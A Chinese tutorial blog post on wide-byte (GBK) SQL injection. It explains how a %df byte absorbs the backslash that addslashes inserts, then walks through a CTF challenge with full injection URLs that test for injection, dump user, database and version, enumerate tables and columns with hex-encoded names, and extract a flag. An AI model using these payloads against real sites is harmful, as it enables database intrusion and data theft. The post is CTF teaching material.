宽字节注入

本文介绍宽字节注入,利用mysql使用GBK编码时将两个字符认作一个汉字的特性实现注入。阐述了字符、字符集、UTF8、宽字节等原理,记录URL转码和addslashes函数逃逸方法,还通过例题展示宽字节注入的测试与绕过字符转义找flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

宽字节注入

0X01 原理

宽字节注入是利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围),示例如下图:

FVqUyV.png

PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。如上图所示%df’被PHP转义,单引号被加上反斜杠\,变成了%d’,其中\的十六进制是%5C,那么现在%d’=%d%5C%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK编码时,会认为%df%5C是一个宽字符,也就是縗,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就可以注入了。

字符、字符集

字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(encoding)来确定这个字符在该字符集中的位置。

UTF8

由于ASCII表示的字符只有128个,因此网络世界的规范是使用UNICODE编码,但是用ASCII表示的字符使用UNICODE并不高效。因此出现了中间格式字符集,被称为通用转换格式,及UTF(Universal Transformation Format)。

宽字节

GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。

0X02 相关小记

URL转码

’ ——> %27

空格 ——> %20

#符号 ——> %23

\ ——> %5C

addslashes函数:

FVvA29.md.png

如何从addslashes函数逃逸出来?

1.\前面再加一个\(或单数个),变成\ \ ',这样\被转义了,'逃出了限制

2.把\弄没

0X03 例题解析

题目地址http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

1.先测试是否可以注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1 -- -

FZp0wq.md.png

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 -- -

FZpBT0.md.png

可以看出,可以注入。

2.继续注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -

FZprkV.md.png

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -

sae-chinalover十六进制是0x7361652d6368696e616c6f766572,用十六进制来绕过字符转义

FZp26J.md.png

3.在文件里找到flag即可

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -

FZpcpF.md.png

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(id,content) from ctf2-- -

FZ93u9.md.png思路是对的,也找出来flag了,但是真正的flag是nctf{gbk_3sqli},可能出了点小问题。但是考点和思路都是宽字节注入,仅供参考。

评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值